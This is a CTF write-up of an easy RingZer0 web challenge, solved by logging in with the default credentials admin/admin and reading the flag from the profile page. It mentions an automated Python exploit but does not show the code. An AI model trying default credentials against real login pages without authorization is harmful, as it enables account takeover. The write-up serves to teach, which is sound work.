📊 Challenge Overview

Category	Details	Additional Info
🏆 Event	RingZer0 CTF	Event Link
🔰 Category	Web	🌐
💎 Points	1	Out of 1 total
⭐ Difficulty	🟢 Easy	Personal Rating: 1/10
👤 Author	Breached Company	Profile
🎮 Solves (At the time of flag submission)	344	solve rate
📅 Date	06-03-2025	RingZer0 CTF
🦾 Solved By	mH4ck3r0n3	Team:

🎯 Challenge Files & Infrastructure

Provided Files

1	Files: None

🔍 Initial Analysis

First Steps

Initially, the website appears as follows:

We are given a link (https://www.itgovernance.co.uk/blog/63-of-data-breaches-involve-weak-default-or-stolen-passwords) to an article that discusses data breaches caused by weak default passwords. Let’s move on to the exploitation phase.

🎯 Solution Path

Exploitation Steps

Exploitation

The first thing that came to my mind was to try accessing https://ringzer0ctf.com/login with default credentials. The most common ones are username=admin&password=admin.

By trying to log in with these credentials and going to the Your Profile section (https://ringzer0ctf.com/user), I found the flag in the E-mail field.

Flag capture

🛠️ Exploitation Process

Approach

The automatic exploit manually sets the PHPSESSID of the admin account, as automating the process fully becomes a bit tricky due to the csrf-token issue. After that, it makes a GET request to /user and extracts the flag from the response using a regex.

•  Exploit

🚩 Flag Capture

Flag

Proof of Execution

Screenshot of successful exploitation

🔧 Tools Used

Tool	Purpose
Python	Exploit

💡 Key Learnings

Skills Improved

• Binary Exploitation
• Reverse Engineering
• Web Exploitation
• Cryptography
• Forensics
• OSINT
• Miscellaneous

📚 References & Resources

Learning Resources

• https://www.thehacker.recipes/web/config/default-credentials
• https://github.com/ihebski/DefaultCreds-cheat-sheet

📊 Final Statistics

Created: 06-03-2025 • Last Modified: 06-03-2025 *Author: mH4ck3r0n3 • Team: *